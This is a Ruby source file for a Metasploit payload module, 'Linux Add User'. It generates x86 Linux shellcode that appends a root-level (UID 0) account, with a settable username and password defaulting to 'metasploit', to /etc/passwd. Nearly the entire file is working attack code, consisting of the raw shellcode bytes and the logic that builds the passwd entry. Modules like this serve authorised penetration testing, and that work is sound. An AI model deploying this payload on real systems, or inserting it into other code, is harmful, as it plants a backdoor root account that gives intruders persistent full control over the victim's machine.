1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
###
7
#
8
# AddUser
9
# -------
10
#
11
# Adds a UID 0 user to /etc/passwd.
12
#
13
###
14
module MetasploitModule
15
  CachedSize = 97
16

17
  include Msf::Payload::Single
18
  include Msf::Payload::Linux::X86::Prepends
19

20
  def initialize(info = {})
21
    super(
22
      merge_info(
23
        info,
24
        'Name' => 'Linux Add User',
25
        'Description' => 'Create a new user with UID 0',
26
        'Author' => [ 'skape', 'vlad902', 'spoonm' ],
27
        'License' => MSF_LICENSE,
28
        'Platform' => 'linux',
29
        'Arch' => ARCH_X86,
30
        'Privileged' => true
31
      )
32
    )
33

34
    # Register adduser options
35
    register_options(
36
      [
37
        OptString.new('USER', [ true, 'The username to create', 'metasploit' ]),
38
        OptString.new('PASS', [ true, 'The password for this user', 'metasploit' ]),
39
        OptString.new('SHELL', [ false, 'The shell for this user', '/bin/sh' ]),
40
      ]
41
    )
42
  end
43

44
  #
45
  # Dynamically builds the adduser payload based on the user's options.
46
  #
47
  def generate(_opts = {})
48
    user = datastore['USER'] || 'metasploit'
49
    pass = datastore['PASS'] || 'metasploit'
50
    shell = datastore['SHELL'] || '/bin/sh'
51
    str = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}\n"
52
    "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58" \
53
      "\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70" \
54
      "\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd" \
55
      "\x80\x93" + Rex::Arch::X86.call(str.length) + str +
56
      "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58" \
57
      "\xcd\x80"
58
  end
59
end
60

61